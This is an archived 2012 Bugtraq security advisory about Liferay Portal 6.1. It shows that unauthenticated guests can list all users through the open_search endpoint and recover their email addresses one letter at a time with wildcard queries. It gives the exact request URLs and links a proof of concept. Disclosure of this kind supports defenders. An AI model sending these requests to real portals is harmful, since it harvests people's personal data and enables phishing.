lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAFJgS8WXhYetjd49EGkBMJMo6eURcjuZGjoq-VF4kJyM9ix8=A@mail.gmail.com>
Date: Sun, 13 May 2012 11:41:35 +0200
From: Jelmer Kuperus <jelmer.advisories@...il.com>
To: BUGTRAQ@...urityfocus.com
Subject: Guests can view names and emailadresses of all Liferay users in
 liferay 6.1

Guests can view names and emailadresses of all Liferay users in liferay 6.1

Description:

Liferay Portal is an enterprise portal written in Java

As an unauthenticated user it is possible to retrieve the names and
email adresses of all Liferay users.
To retrieve a list of all users simply issue the following request

http://vulnerablehost/c/search/open_search?p=1&c=5000&keywords=entryClassName:com.liferay.portal.model.User

Getting to the email adresses is a bit more involved, because these
are not included in the response. But it is still possible to get to
them by utilizing wildcard searches. The following request will return
all users who's email address start with a "b"

http://vulnerablehost/c/search/open_search?p=1&c=5000&keywords=emailAddress:b*

By adding a letter at a time to the emailAddress parameter its
possible to eventually get someone's full email address

Proof of concept:

Code demonstrating the vulnerability can be found at

https://github.com/jelmerk/liferay-opensearch-exploit

Systems affected:

Liferay 6.1 ce
Liferay 6.1 ee is possibly affected

Vendor status :

Liferay  was notified may 5 2012 by filing a bug in their public
bugtracker under issue number
LPS-27146. The issue has since been marked as a duplicate of LPS-25877
which is an issue that one
of the core engineers filed, but not under the security category. This
ticket did not mention the possibility of
obtaining the email addresses  The issue is possibly already silently
resolved in the for-pay enterprise edition
but not in the community edition

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ